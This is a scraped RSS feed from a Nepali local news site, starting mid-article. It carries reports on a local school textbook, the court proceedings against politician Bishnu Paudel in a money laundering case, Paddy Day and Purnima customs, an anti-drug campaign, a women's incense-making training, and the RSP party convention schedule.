उहाँले भन्नुभयो, ‘चालु शैक्षिक वर्षदेखि कक्षा ८ सम्म स्थानीय पाठ्यक्रम विस्तार गर्दै त्यसअनुसारको पाठ्यपुस्तक तयार गरिएको हो ।’ यसले विद्यार्थीलाई आफ्नै गाउँ, समाज र परिवेशबारे ज्ञान हासिल गर्न सहयोग पुग्ने विश्वास गरिएको उहाँले उल्लेख गर्नुभयो ।
उपाध्यक्ष जुनामाया थापाले पाठ्यपुस्तकले विद्यार्थीमा आफ्नै गाउँ, समाज र संस्कृतिप्रति गर्व, अपनत्व र जिम्मेवारीको भावना अझ सुदृढ बनाउने विश्वास व्यक्त गर्नु भयो । आधारभूत तह कक्षा १ देखि ८ सम्मका विद्यार्थीका लागि स्थानीय पाठ्यपुस्तक निर्माण गरेको गाउँपालिकाले जनाएको छ ।
यसअघि गाउँपालिकाले स्थानीय पाठ्यक्रम तयार गरी कक्षा १ देखि ५ सम्म पठनपाठन सुरु गरिेको थियो । अहिले गाउँपालिकाभित्रका ५५ विद्यालयमा ‘हाम्रो मर्स्याङ्दी’को पठनपाठन भइरहेको गाउँपालिकाले जनाएको छ ।
पालिकाका बारेमा गहिरो अध्ययन, छलफल र सुझावका आधारमा स्थानीय पाठ्यक्रमको मापदण्डअनुसार पुस्तक तयार गरिएको गाउँपालिकाका प्रमुख प्रशासकीय अधिकृत पौडेलले बताए । उनका अनुसार भूमिदत्त पौडेलको लेखन संयोजनमा तयार भएको पुस्तकको सम्पादन ऋषिराम श्रेष्ठ, इश्वरबाबु पाण्डेलगायतले गर्नु भएको हो ।
पाठ्यपुस्तकमा गाउँपालिकाको इतिहास, भूगोल, पर्यटकीय तथा धार्मिक स्थल, संस्कृति, रहनसहन, भेषभूषा, विशिष्ट व्यक्तित्व, कृषि, वन पैदावार, जडीबुटी, खनिज पदार्थ, प्राकृतिक स्रोत, पशुपालन तथा स्थानीय कला–संस्कृतिसम्बन्धी विषय समेटिएको गाउँपालिकाले जनाएको छ ।
सामाजिक विकास समिति संयोजक तिलबहादुर गुरुङले स्थानीय ज्ञान, पहिचान र गौरवलाई विद्यालय शिक्षासाग जोड्ने यो प्रयास गाउँपालिकाको शिक्षा क्षेत्रका लागि ऐतिहासिक उपलब्धि भएको बताउनु भयो ।
जम्मा आठ इकाईमा विभाजन गरिएको ‘हाम्रो मर्स्याङ्दी’ पुस्तक कक्षा– १ कोमा एक ९ पेज रहेको छ भने कक्षा– ८ का लागि २०९ पेजमा छपाई भएको सो पुस्तक लेखनमा जुटेका प्रभात शान्तिपूर्ण माविका प्रधानाध्यापक ईश्वरबाबु पाण्डेले जानकारी दिनु भएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=498510पूर्वउपप्रधान एवम् अर्थमन्त्री एवम् एमालेका वरिष्ठ उपाध्यक्ष विष्णु पौडेलको बन्दी प्रत्यक्षीकरणको रिट खारेज, थप ६ दिन हिरासतमा राख्न अनुमति
https://www.antaranganews.com/?p=49808
https://www.antaranganews.com/?p=49808#respondFri, 03 Jul 2026 12:34:26 +0000https://www.antaranganews.com/?p=49808काठमाडौं– सर्वोच्च अदालतले पूर्वउपप्रधान एवम् अर्थमन्त्री एवम् एमालेका वरिष्ठ उपाध्यक्ष विष्णु पौडेलको बन्दी प्रत्यक्षीकरणको रिट खारेज गरिदिएको छ । पौडेलको हकमा उहाँकी श्रीमती दोमाया पौडेलले दायर गर्नु भएको रिट सर्वोच्च अदालतले असार १८ गते फैसला सुनाएको हो । पौडेललाई थप ६ दिन हिरासतमा राख्न अनुमति दिएको छ ।
न्यायाधीशद्वय विनोद शर्मा र नित्यानन्द पाण्डेयको इजलासले त्यस्तो आदेश दिएको हो । सर्वोच्चका प्रवक्ता अर्जुन कोइरालाले रिट खारेजीको फैसला भएको जानकारी दिनु भयो । उहाँका अनुसार आदेशको लिखितप्रति आउन केही दिन लाग्ने छ ।
सर्वोच्चको सो आदेशसँगै सम्पत्ति शुद्धीकरण अनुसन्धान विभागलाई पौडेलमाथि हिरासतमा राखेर थप अनुसन्धान अघि बढाउन कानुनी बाटो खुला भएको छ ।
सर्वोच्चले व्यवसायी दीपक भट्ट र सुलभ अग्रवालविरुद्ध विशेष अदालतमा दायर सम्पत्ति शुद्धीकरण, बैंकिङ कसुर र धितोपत्रसम्बन्धी मुद्दाका सक्कल फाइलहरू मगाएर अध्ययन गरेपछि रिट खारेज गर्ने निर्णय लिएको हो ।
पौडेलविरुद्ध विशेष अदालतबाट मात्रै तेस्रोपटक ६ दिनको म्याद थप भइसकेको छ ।
सम्पत्ति शुद्धीकरणको अभियोगमा पक्राउ परेका पौडेललाई विशेष अदालतले सात दिन हिरासतमा राख्न अनुमति दिएपछि दोमायाले बन्दी प्रत्यक्षीकरणको रिट दर्ता गराउनु भएको थियो । पौडेललाई राजनीतिक प्रतिशोधका आधारमा गैरकानुनी थुनामा राखिएको दाबीसहित बन्दीप्रत्यक्षीकरण रिट दायर भएको थियो । गैरकानुनी रूपमा हिरासतमा राखेको दाबीसहित दायर रिटमा विशेष अदालतसहित पाँच निकायलाई विपक्षी बनाइएको थियो ।
करोडौँको संदिग्ध आर्थिक कारोबार र सम्पत्तिको स्रोत नखुलेपछि सम्पत्ति शुद्धीकरण अनुसन्धान विभागले पौडेललाई सुर्खेतबाट नियन्त्रणमा लिएको थियो ।
असार ८ गते सुर्खेतबाट पक्राउ परेका पौडेललाई गैरकानुनी रूपमा थुनामा राखिएको दाबी गर्दै उनकी श्रीमती दोमायाले असार १० गते सर्वोच्चमा बन्दीप्रत्यक्षीकरण रिट दायर गर्नु भएको थियो ।
सम्पत्ति शुद्धीकरणकै कसुरमा पुर्पक्षका लागि थुनामा रहेका व्यवसायी दीपक भट्टसँग पौडेलको शंकास्पद सम्बन्ध देखिएपछि विभागले उनलाई पक्राउ गरेको हो । व्यवसायी दीपक भट्टको एकल नियन्त्रणमा रहेको हिमालयन एसेट्स म्यानेजमेन्ट प्रालिले श्रीराम टोबाको उद्योग प्रालिको २० प्रतिशत सेयर खरिद गर्दा पौडेलले अर्थमन्त्रीको हैसियतमा राजनीतिक प्रभाव दुरूपयोग गरेको आरोप सरकारी पक्षको छ ।
यसैबीच विशेष अदालतबाट तेस्रोपटक ६ दिन म्याद थप असार १८ गते गरिएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=498080एमालेका वरिष्ठ उपाध्यक्ष विष्णु पौडेललाई थप तीन दिन हिरासतमा राख्न विशेष अदालतको आदेश
https://www.antaranganews.com/?p=49738
https://www.antaranganews.com/?p=49738#respondMon, 29 Jun 2026 13:11:57 +0000https://www.antaranganews.com/?p=49738काठमाडौं– विशेष अदालतले नेकपा एमालेका वरिष्ठ उपाध्यक्ष विष्णुप्रसाद पौडेललाई थप तीन दिन हिरासतमा राख्न अनुमति दिएको छ । यो म्याद थप गरिएको दोस्रो पटक हो । यसअघि सात दिनको म्याद दिइएको हो । आज उपस्थित गराइदा अदालतले असार १५ गते त्यस्तो आदेश दिएको हो ।
सम्पत्ति शुद्धीकरणको कसुरमा अनुसन्धानका लागि नियन्त्रणमा रहेका पौडेललाई दोस्रो पटक तीन दिनको म्याद थप भएको सूचना अधिकारी पार्वती हितानले बताउनु भयो । उहाँका अनुसार न्यायाधीशहरू नारायणप्रसाद पौडेल, हेमन्त रावल र उमेश कोइरालाको इजलासले उनलाई म्याद थप गरेको हो । विशेष अदालतले यसअघि असार ८ देखि लागू हुने गरी सात दिन हिरासतमा राख्न अनुमति दिएको थियो । अदालतले दिएको उक्त म्याद असार १४ गते सकिएको थियो ।
सम्पत्ति शुद्धीकरण अनुसन्धान विभागले उनलाई यसअघि ७ दिन हिरासतमा राखी अनुसन्धान गरिसकेको छ ।
सम्पत्ति शुद्धीकरणकै अनुसन्धानको क्रममा पुर्पक्षको लागि थुनामा रहेका दिपक भट्टको सेयर कारोबारमा उपाध्यक्ष पौडेललाई पनि जोडेर अनुसन्धानका लागि असार ८ गते प्रहरीले पक्राउ गरेको थियो ।
विभागको पत्रपछि प्रहरीले उनलाई जरूरी पक्राउ पुर्जी दिएर भ्यानमा काठमाडौं ल्याएको हो । विशेष अदालतले हिरासतमा राख्न अनुमति दिएपछि उहाँकी पत्नी दोमायाले सर्वोच्चमा बन्दी प्रत्यक्षीकरणको रिट दायर गर्नु भएको छ । त्यसमा प्रारम्भिक सुनुवाइ गर्दै न्यायाधीश श्रीकान्त पौडेलको इजलासले विपक्षीका नाममा कारण देखाउ आदेश जारी गरेको छ । त्यसको सुनुवाइका लागि १७ गते पेसी समेत तोकिएको छ ।
विष्णु पौडेलको पक्राउ किन ?
एमालेका वरिष्ठ उपाध्यक्ष पौडेललाई सम्पत्ति शुद्धीकरणकै कसुरमा पुर्पक्षका लागि थुनामा रहेका दिपक भट्टसँग कनेक्सन देखिएको भन्दै पक्राउ गरिएको हो । भट्टको एकल नियन्त्रणमा रहेको हिमालयन एसेट्स म्यानेजमेन्ट प्रालिले श्रीराम टोबाको उद्योग प्रालिको २० प्रतिशत शेयर किनबेच गरेको विषयमा पौडेललाई जोडेको बताइएको छ । २० प्रतिशत शेयरको मूल्य किताबीमूल्य अनुसार करिब ३० करोड पर्ने तर बिक्री हुँदा ३ करोड ७५ लाखमा भएको भनेर सरकारी वकिलले पौडेललाई हिरासतमा राख्न म्याद माग गर्दा इजलासमा बताइएको थियो ।
पौडेलले आफू अर्थमन्त्री हुँदा राजनीतिक प्रभावको दुरूपयोग गरेको र भट्टलाई सो सेयर दिलाउनका लागि २६ करोड २५ लाख भन्दा बढी रकम सम्पत्ति शुद्धीकरण गर्नका लागि आफैं संलग्न भएको बहसको क्रममा सरकारी वकिलले उठाएका छन् । विभागले चुन्नुप्रसाद शर्मा र कमलकिशोर मालपानीले दिएको बयानलाई पनि आधार बनाएर पक्राउ गरेको बहसको क्रममा उल्लेख गरिएको छ । चुन्नुप्रसाद शर्मा नेपाली कांग्रेसबाट गएको निर्वाचनमा रूपन्देही क्षेत्र नम्बर २मा उम्मेदवार थिए। उनी व्यवसायी समेत हुन् ।
‘दीपक भट्टलाई साझेदारका रूपमा भित्र्याउँदा तत्कालीन अर्थमन्त्री विष्णुप्रसाद पौडेलले सरकारी निकायहरूमा सहजीकरण गरिदिने, व्यापार व्यवसाय विस्तार गर्न सहयोग पु¥याउने तथा त्यस वापत श्रीराम टोबाको उद्योग प्रा.लि.को २० प्रतिशत शेयर निजकै हितका लागि उपलब्ध गराइएको,’ शर्माले विभागमा बयान दिएका थिए।
यही बयानलाई आधार बनाएर विभागले पौडेललाई पक्राउ गरेको तर्क सरकारी वकिलको थियो।
श्री राम टोबाकोको शेयर किताबी मूल्य ८१६.७१ रुपैयाँ देखिए पनि १०० रुपैयाँमा श्रीराम टोबाको उद्योग प्रा.लि.को ३७५,००० कित्ता बिक्री गरेको पनि उल्लेख छ ।
पूर्वउपप्रधान तथा अर्थमन्त्रीसमेत रहनु भएका पौडेल गत असार ८ गते सुर्खेतबाट पक्राउ गरिएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=497380आज असार १५, पूर्णिमा तिथि : राष्ट्रिय धान दिवसका कारण अझेलमा
https://www.antaranganews.com/?p=49726
https://www.antaranganews.com/?p=49726#respondMon, 29 Jun 2026 01:53:00 +0000https://www.antaranganews.com/?p=49726लमजुङ– आज असार १५ गते वैदिक सनातन संस्कृति अनुसार पूर्णिमा तिथि परेको छ । तर राष्ट्रिय धान दिवसका कारण पूर्णिमा तिथिको महत्व भने अझेलमा परेको छ । पूर्णिमा तथा औंशीको दिनमा खेतबारीमा खन, जोत गर्न ढिंकी, जाँतो चलाउन हुँदैन भन्ने सांस्कृतिक मान्यता रहेको छ ।
पूर्णिमाको दिनमा चन्द्रमाबाट पृथ्वीमा अमृतको वर्षा हुने हुँदा पृथ्वीमा खनजोतका कार्य गर्न शास्त्रले निषेध गरेको पं. घनश्या सुवेदीले बताउनु भएको छ । उहाँका अनुसार खनजोत गर्दा अमृत पृथ्वीको माथिल्लो सतहमा सिंचित हुन पाउँदैन खनीखोस्री गरेको स्थानबाट पातालतर्फ जाने हुँदा त्यस्तो कार्यले देवताहरू र पितृहरू रिसाउछन्, जसका कारण अनिष्ट हुन्छ भन्ने शास्त्रमा उल्लेख छ । उहाँले भन्नुभयो, ‘देवता र पितृहरू रिसाउँदा अकाल मृत्यु हुने, भोकमरी पर्ने, खडेरी पर्ने जस्ता अनिष्ठ हुन्छन् भन्ने छ ।’ ‘असारे भाका’को संरक्षण गर्नका लागि छायाँकंनको कार्यक्रम रद्द :
यो वर्ष ‘असारे भाका’को संरक्षणका लागि छायाँकंनको कार्यक्रम गर्ने तयारी गरेको ठाडोभाका लोककला प्रतिष्ठान नेपालले असार १५ गते पूर्णिमा तिथि परेको थाहा पाएपनि सो कार्यक्रम रद्द गरेको छ । ठाडोभाका लोककला प्रतिष्ठान नेपालले लोपोन्मुख लोक संस्कृतिको संरक्षण अभियान सञ्चालन गरिरहेको छ । यो वर्ष असार १५ गने मनाइने धान दिवसका दिन लोपोन्मुख ‘असारे भाका’को संरक्षण गर्नका लागि छायाँकंनको कार्यक्रम राख्ने तयारी गरेको थियो । तर पूर्णिमा तिथि परेको जानकारी आएपछि उक्त कार्यक्रम रद्द गरिएको प्रतिष्ठानका अध्यक्ष नवराज पहाडीले बताउनु भयो । उहाँका अनुसार प्रतिष्ठानको मूल उद्देश्य लोक संस्कृतिको संरक्षण र प्रवर्द्धन गर्ने हो । संस्कृतिकै महत्वको दिन पूर्णिमा परेर खनजोत गर्न हुन्न भनेपछि संस्कृतिका विरुद्धको कार्य कसरी गर्न सकिन्छ ? भन्ने भयो र कार्यक्रम नै रद्द गरियो उहाँले भन्नुभयो । ‘जलवायुमैत्री प्रविधि, धानमा आत्मनिर्भरता र समृद्धि’ :
यो वर्ष ‘जलवायुमैत्री प्रविधि, धानमा आत्मनिर्भरता र समृद्धि’ भन्ने नाराका साथ २३ औँ राष्ट्रिय धान दिवस विभिन्न कार्यक्रमको आयोजना गरी मनाइँदै छ । कृषिको परनिर्भरता कम गर्न र किसानलाई हौसला पु¥याउन प्रत्येक वर्ष धान दिवस मनाइँदै आएको छ । नेपाल कृषि अनुसन्धान परिषद् (नार्क) को सिफारिसमा २०६१ साल मंसिर २९ गतेको मन्त्रिस्तरीय निर्णयबाट असार १५ गतेलाई धान दिवसका रुपमा मनाउन शुरु गरिएको हो ।
आजको दिनलाई दही चिउरा खाने दिनका रुपमा समेत लिइन्छ । आजको दिन दही चिउरा खानु संस्कृति नै बनेको छ ।
नेपाल कृषि अनुसन्धान परिषद् (नार्क) को खुमलटारस्थित राष्ट्रिय बाली विज्ञान अनुसन्धान केन्द्रमा विशेष समारोहका बिच महोत्सव मनाउन लागिएको हो ।
कृषि क्षेत्रबाट प्राप्त कूल गार्हस्थ्य उत्पादनमध्ये धानको योगदान १२ प्रतिशत छ । राष्ट्रिय उत्पादन (जिडिपी) मा कृषि क्षेत्रको योगदान भने ३३ प्रतिशत छ । धान नेपालको प्रमुख खाद्यान्न बाली हो । धानको उत्पादन बढ्दा कूल गार्हस्थ्य उत्पादनमा वृद्धि हुन्छ ।
जल, जमीन र जनशक्ति पर्याप्त भए पनि धानको उत्पादनमा सन्तोषजनक वृद्धि हुन सकेको छैन । युवा जनशक्ति विदेश पलायन हुनु, खेतीयोग्य जमीन खण्डीकरण भई घडेरीकरणमा रुपान्तरण हुनु पर्याप्त सिञ्चित जमीन नहुनु, उन्नत जातका बीउबिजनको प्रयोग नगर्नु र प्राङ्गारिक तथा रासायनिक मलको सही रुपमा प्रयोग नहुनु एवं धानको समर्थन मूल्य नतोकिनुले धानको उत्पादन बढ्न नसकेको कृषि विज्ञहरूको भनाइ छ ।
नेपालीहरू दुई छाक अनिवार्य नत्र तीनै छाक भए पनि भात खाने गर्छन् । सो बानीले गर्दा चामलको आयात बढेको छ । सरकारले भने धानको उत्पादन दोब्बर वृद्धि गर्ने लक्ष्य लिएको छ ।
खाद्यान्न उपभोग गर्ने जनशक्ति बढेसँगै उत्पादनको बढोत्तरी आवश्यक छ । तर नेपालमा भने कूल खेतीयोग्य जमीनमध्ये धेरै बाँझो छ । सरकारी तथ्याङ्कअनुसार करीब ३१ लाख हेक्टर जमीन खेतीयोग्य छ । उन्नत जात भित्र्याउने नाममा स्थानीय धानका जात प्रायः लोप भइसकेका छन् ।
नेपाल संसारकै अग्लो स्थानमा धान उत्पादन गर्ने देशमा पनि पर्छ । जुम्लाको छुमचौरमा उत्पादन हुने जुम्लीमार्सी धान विश्वमा प्रसिद्ध छ । तर, उक्त धान मागअनुसारको उत्पादन हुन सकेको छैन । नेपालको झापा जिल्लामा सबैभन्दा धेरै धान उत्पादन हुन्छ ।
राष्ट्रिय कृषि गणना २०७८ अनुसार नेपालका ४१ लाख ३१ हजार कृषक घरधुरीमध्ये २७ लाख ६५ हजार (करिब ६७ प्रतिशत) धान खेतीमा आबद्ध छन् । कुल खेतीयोग्य जमिनको ५४ प्रतिशत भूभागमा धान खेती हुने गरेको छ । नेपालमा वार्षिक १० लाख टन धान अपुग :
नेपालमा वार्षिक १० लाख टन धान अपुग हुने गरेको छ । कृषि विभागका अनुसार पछिल्ला पाँच वर्षको तथ्यांक हेर्दा धानको क्षेत्रफल क्रमशः घट्दै गए पनि उत्पादकत्वमा भने सुधार आएको छ ।
आ.व. २०७६/७७ मा प्रतिहेक्टर ३.८० मेट्रिक टन रहेको उत्पादकत्व वृद्धि भई आव २०८१/८२ मा ४.१९ मेट्रिक टन पुगेको छ । पछिल्लो वर्ष १४ लाख २० हजार हेक्टर क्षेत्रफलबाट ५९ लाख ५५ हजार मेट्रिक टन धान उत्पादन भएको थियो ।
नेपालको कुल आवश्यकता करिब ७० लाख मेट्रिक टन रहेको विश्लेषण छ । त्यसरी हेर्दा अझै वार्षिक १० लाख मेट्रिक टन धान अपुग हुने स्थिति छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=497260लागूऔषध नियन्त्रण सम्बन्धी सप्ताहव्यापी अभियानको समापन
https://www.antaranganews.com/?p=49706
https://www.antaranganews.com/?p=49706#respondSun, 28 Jun 2026 01:41:40 +0000https://www.antaranganews.com/?p=49706बेसीशहर– लमजुङको जिल्ला सदरमुकाममा एक कार्यक्रमको आयोजना गरी लागूऔषध दुरुपयोग तथा ओसारपसारविरुद्धको अन्तर्राष्ट्रिय दिवसको साताव्यापी कार्यक्रमको समापन भएको छ । लागूऔषध दुरुपयोग तथा ओसारपसारविरुद्धको अन्तर्राष्ट्रिय दिवस (जुन २६) को अवसरमा सञ्चालित अभियानको असार १२ गते समापन गरिुएको हो ।
उक्त साताव्यापी कार्यक्रमअन्तर्गत जिल्लाका विभिन्न विद्यालय तथा संघसंस्थाहरूमा लागूऔषध नियन्त्रण सम्बन्धी सचेतनामूलक प्रशिक्षण सञ्चालन गरिएको जानकारी दिइएको थियो । सोही सन्दर्भमा जिल्लाका विभिन्न नाकाहरूमा विशेष चेकजाँच, जनचेतनामूलक अभियान तथा प्रभातफेरी कार्यक्रमसमेत आयोजना गरिएको जिल्ला प्रहरी कार्यालयले जनाएको छ । सो कार्यालयका अनुसार चालु आवमा लागू औषधका आठवटा मुद्दा दर्ता गरिएको छ ।
उक्त कार्यक्रममार्फत लागूऔषध दुरुपयोग नियन्त्रणमा सबै पक्षको साझा जिम्मेवारी रहेको भन्दै समुदायस्तरमै सचेतना अभिवृद्धि गर्न यस्ता अभियानलाई निरन्तरता दिइने आयोजकको भनाइ छ ।
लागूऔषधविरुद्ध जनचेतनामूलक ब्यानर र प्लेकार्डसहित सहभागीहरू बेसीशहर नगरपालिका– ७ स्थित मनाङ्गे चौताराबाट सुरु भएको प्रभातफेरी पुरानो बैंक चोक, भीमसेन स्थान, नारयणस्थान हुँदै फूलबारीसम्म पुगेका थिए । फूलबारीमा आयोजित समापन कार्यक्रममार्फत सप्ताहव्यापी अभियानको औपचारिक समापन गरिएको थियो ।
लागूऔषध दुव्र्यसनबाट युवालाई टाढा राख्न खेलकुद प्रभावकारी माध्यम बन्न सक्ने सन्देश प्रवाह गर्ने उद्देश्यले महिला प्रहरी र महिला पत्रकार बीच मैत्रीपूर्ण फुटसल प्रतियोगिता समेत आयोजना गरिएको थियो । सो खेलमा दुवैपक्षबाट बराबरी २/२ गोल गरेका थिए । सहभागीलाई प्रजिअ खनालले प्रमाणपत्र वितरण गर्नु भएको थियो ।
जिल्ला प्रशासन कार्यालय लमजुङको आयोजनामा असार ६ गतेदेखि सो अभियान सुरु भएको थियो । कार्यक्रमको समापन जिल्ला प्रहरी कार्यालय, लमजुङले गरेको हो । समापन कार्यक्रमको अवसरमा जिल्ला प्रशासन कार्यालय लमजुङका प्रमुख जिल्ला अधिकारी कृष्णप्रसाद खनाल, सहायक प्रमुख जिल्ला अधिकारी थम्मनसिंह गौतम, प्रहरी नायव उपरीक्षक जितेन्द्रकुमार बस्नेत, सशस्त्र प्रहरी बल नेपाल आश्रित गुल्म लमजुङका प्रमुख सशस्त्र प्रहरी नायब उपरीक्षक विकास अधिकारी, विभिन्न सरकारी कार्यालयका कर्मचारी, संघसंस्थाका प्रतिनिधि, सुरक्षाकर्मी तथा सर्वसाधारणको सहभागिता रहेको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=497060तीनदिने बाटेको धुप बनाउने तालिमको समापन, थप सीपमूलक तालिमको माग
https://www.antaranganews.com/?p=49592
https://www.antaranganews.com/?p=49592#respondTue, 23 Jun 2026 16:15:30 +0000https://www.antaranganews.com/?p=49592सुन्दरबजार(लमजुङ)– तीनदिने बाटेको धुप बनाउने तालिमको समापन गरिएको छ । तालिमका सहभागीले थप सीपमूलक तालिमको माग गरेका छन् । सो तालिमको असार ९ गते समापन गरिएको हो ।
सुन्दरबजार कृषि हाटबजार परिसरमा सम्पन्न समापन कार्यक्रममा आयोजक केन्द्रका संस्थापक अध्यक्ष राधादेवी श्रेष्ठको सभापतित्व तथा सुन्दरबजार नगरपालिकाकी पूर्व उपप्रमुख ज्ञानु शाहको प्रमुख आतिथ्यता थियो । शाहले सहभागीहरूलाई प्रमाणपत्र वितरण गर्नु हुँदै महिलाहरूको आयआर्जन तथा जीवनस्तर उकास्न यस्ता सीपमूलक तालिमले महत्वपूर्ण भूमिका खेल्ने बताउँदै सिकेको सीपलाई व्यवहारमा उतार्न सहभागीलाई आग्रह गर्नुभयो ।
दिदीबहिनी कृषि समूहका अध्यक्ष बालकुमारी गुरुङले यस्तो तालिमले महिलाहरूको सीप र क्षमता अभिवृद्धि हुने बताउँदै आफूहरूले धुपका साथै पाती निमको पातबाट साबुन उत्पादन गरी बजारीकरणसमेत गर्ने योजना रहेको जानकारी दिनुभयो ।
समापन कार्यक्रममा शुभकामना मन्तव्य राख्दै सुन्दरबजार चेम्बर अफ कमर्सका अध्यक्ष विष्णु कुमार श्रेष्ठले स्थानीय उत्पादनको प्रवद्र्धनका लागि अचार तथा क्यान्डी उत्पादन, नेतृत्व विकास र उद्घोषणसम्बन्धी तालिम सञ्चालन गर्न आवश्यक रहेको बताउनु भयो । उहाँले सम्बन्धित निकायसँग त्यसका लागि सहजीकरण गर्ने प्रतिबद्धता समेत व्यक्त गर्नुभयो ।
कार्यक्रमका सभापति राधादेवी श्रेष्ठले सामुदायिक सिकाइ केन्द्रले आगामी दिनमा पनि महिलाको आर्थिक सशक्तीकरण, स्वरोजगार प्रवद्र्धन तथा उद्यमशीलता विकासका लागि यस्ता सीपमूलक कार्यक्रमलाई निरन्तरता दिने प्रतिबद्धता व्यक्त गर्नुभयो ।
प्रशिक्षक सरस्वती देवी थापाले बाटेको धुप बनाउने सम्बन्धी सैद्धान्तिक तथा प्रयोगात्मक प्रशिक्षण प्रदान गर्नुभएको थियो । सो तालिममा ३० जना महिलाहरूले भाग लिएका थिए ।
सहभागी जमुना कोइरालाले तालिम अत्यन्त प्रभावकारी भएको बताउँदै सिकेको सीपलाई व्यवहारमा उतारेर निरन्तरता दिने प्रतिबद्धता व्यक्त गर्नुभयो । अर्का सहभागी काशी गुरुङले आगामी दिनमा पनि यस्ता आयमूलक तथा सीपमूलक तालिमलाई निरन्तर सञ्चालन गर्न आग्रह गर्नुभयो ।
त्यस्तै सहभागी श्यामका घिमिरेले स्थानीय कृषि हाटबजारसँगै अनलाइन तथा सामाजिक सञ्जालमार्फत पोखरा, काठमाडौं र नारायणगढसम्म उत्पादनको बजार विस्तार गर्न सके महिलाहरूको आर्थिक अवस्था सुधार हुने विश्वास धारणा व्यक्त गर्दै सम्बन्धित निकायलाई यस्ता कार्यक्रम निरन्तर सञ्चालन गर्न अनुरोध गर्नुभयो ।
सुन्दरबजार सामुदायिक सिकाइ केन्द्र, लमजुङको आयोजनामा भएको सो तालिममा सुन्दरबजार नगरपालिकाको आर्थिक सहयोग रहेको संस्थाकी प्रमुख रश्मी पौडेलले बताउनु भयो । उहाँले सञ्चालन गर्नुभएको समापन कार्यक्रममा तालिम अवधिमा बाटिएका धुपको प्रदर्शन समेत गरिएको थियो ।
]]>https://www.antaranganews.com/?feed=rss2&p=495920रास्वपा महाधिवशेन : दिउँसो २ बजेदेखि बन्दसत्र सुरु गर्ने कार्यतालिका सार्वजनिक, समर्थकका कारण उम्मेदवार घट्ने संकेत
https://www.antaranganews.com/?p=49578
https://www.antaranganews.com/?p=49578#respondTue, 23 Jun 2026 07:20:22 +0000https://www.antaranganews.com/?p=49578भरतपुर(चितवन)– राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा) को यहाँ जारी पहिलो राष्ट्रिय महाधिवेशन अन्तर्गत बन्दसत्र तेस्रो दिन असार ९ गते दिउँसो २ बजे मात्र सुरु हुने भएको छ । बन्दसत्रमा विभिन्न प्रतिवेदनहरू प्रस्तुत गर्ने र नयाँ नेतृत्व चयनको प्रक्रिया अघि बढाउने गरी विस्तृत कार्यतालिका आजै सार्वजनिक गरिएको छ ।
बिहान १० बजेदेखि नै प्रतिनिधि दर्ताको कार्य सुरु भएको महामन्त्री कविन्द्र बुर्लाकोटीले जानकारी दिनु भयो । उहाँका अनुसार दिउँसो २ बजे पार्टी सभापति रवि लामिछानेले बन्दसत्रको औपचारिक आरम्भ गर्ने कार्यक्रम तय भएको छ ।
उहाँले भन्नुभयो, ‘बन्दसत्र सुरु भएलगत्तै विभिन्न निकायका प्रतिवेदनहरूमाथि छलफल हुनेगरी कार्यतालिका सार्वजनिक गरिएको छ ।’ रास्वपा महाधिवेशनः प्रतिनिधि परिचयपत्र नौ ठाउँबाट बाँडिएको महामन्त्रीको भनाइ छ ।
पार्टीका सहमहामन्त्रीले विधानमाथिको छलफल र त्यसलाई अनुमोदन गराउने कार्य सम्पन्न भएपछि मात्र बन्द सत्रमा सभापति रवि लामिछानेले राजनीतिक प्रतिवेदन, पार्टीको भावी दिशा निर्देश गर्ने अर्थ–राजनीतिक प्रस्तावना उपसभापति डा. स्वर्णिम वाग्लेले प्रस्तुत गनुर्् हुनेछ । घोषित तालिका अनुसार दिउँसो २ः१० बजे अनुशासन आयोगका तर्फबाट रमाकान्त रिमालले आयोगको प्रतिवेदन प्रस्तुत गर्नु हुनेछ, २ः३० बजे कोषाध्यक्ष लिमा अधिकारीले पार्टीको वित्तीय प्रतिवेदन प्रस्तुत गर्नु हुनेछ । दिउँसो ३ः०० बजे पार्टी महामन्त्री कविन्द्र बुर्लाकोटीले सांगठनिक प्रतिवेदन प्रस्तुत गरेपछि ती प्रतिवेदनमाथि प्रतिनिधिहरूबीच विस्तृत छलफल गराइने छ ।
अपराह्न ३ः४५ बजे पार्टीका सहमहामन्त्री विपिन आचार्यले केन्द्रीय समितिबाट पारित विधान संशोधन प्रस्ताव प्रस्तुत गर्ने छन् र त्यसलाई बन्द सत्रबाट अनुमोदन गराइनेछ ।
विधान संशोधनपछि पार्टीको मार्गदर्शक सिद्धान्तका रूपमा हेरिएको महत्त्वपूर्ण अर्थ–राजनीतिक प्रस्तावना उपसभापति डा. स्वर्णिम वाग्लेले बेलुकी ४ः४५ बजे प्रस्तुत गर्ने कार्यक्रम छ ।
आजको बन्द सत्रको अन्तिम चरणमा साँझ ५ः१५ बजे पार्टी सभापति रवि लामिछानेले आफ्नो राजनीतिक प्रतिवेदन प्रस्तुत गर्ने कार्यतालिका तय गरिएको छ । त्यस्तै बेलुकी ६ः३५ बजे सभापति लामिछानेले अन्तरिम व्यवस्थापन समिति गठनको घोषणा गर्ने छन् र आयोजक समितिले आफ्नो सम्पूर्ण जिम्मेवारी निर्वाचन आयोगलाई हस्तान्तरण गर्नेछ ।
बन्दसत्रको अन्तिम चरणमा सभापति लामिछानेले अन्तरिम व्यवस्थापन समितिको गठनको घोषणा गर्नु हुनेछ । त्यससँगै आयोजक समितिले निर्वाचनको सम्पूर्ण जिम्मेवारी निर्वाचन आयोगलाई हस्तान्तरण गर्ने छ । निर्वाचन आयोगले निर्वाचन प्रक्रिया सम्बन्धी जानकारी र विस्तृत समयतालिका प्रकाशन गर्नेछ, त्यसपछि मात्र नेतृत्व चयनको प्रक्रिया निरन्तर अगाडि बढ्ने पार्टीको भनाइ छ । उम्मेदवारका प्रस्तावक र समर्थक उम्मेदवार बन्न नपाउने : उम्मेदवार घट्ने संकेत
